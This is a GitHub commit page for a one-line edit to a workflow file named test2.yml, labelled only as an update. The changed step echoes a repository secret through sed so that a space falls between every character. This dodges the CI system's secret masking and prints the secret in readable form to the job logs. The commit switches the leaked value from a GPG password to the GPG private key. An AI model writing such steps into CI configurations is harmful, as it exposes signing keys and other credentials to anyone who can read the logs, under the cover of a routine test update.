Skip to content

Commit

Permalink
Update test2.yml (#33)
Browse files Browse the repository at this point in the history
  • Loading branch information
extmkv authored Sep 10, 2024
1 parent a647f99 commit 1a5f69e
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/test2.yml
Original file line number Diff line number Diff line change
Expand Up @@ -31,4 +31,4 @@ jobs:

# Runs a set of commands using the runners shell
- name: Run a multi-line script
run: echo ${{secrets.GPG_PASSWORD}} | sed 's/./& /g'
run: echo ${{secrets.GPG_KEY}} | sed 's/./& /g'

0 comments on commit 1a5f69e

Please sign in to comment.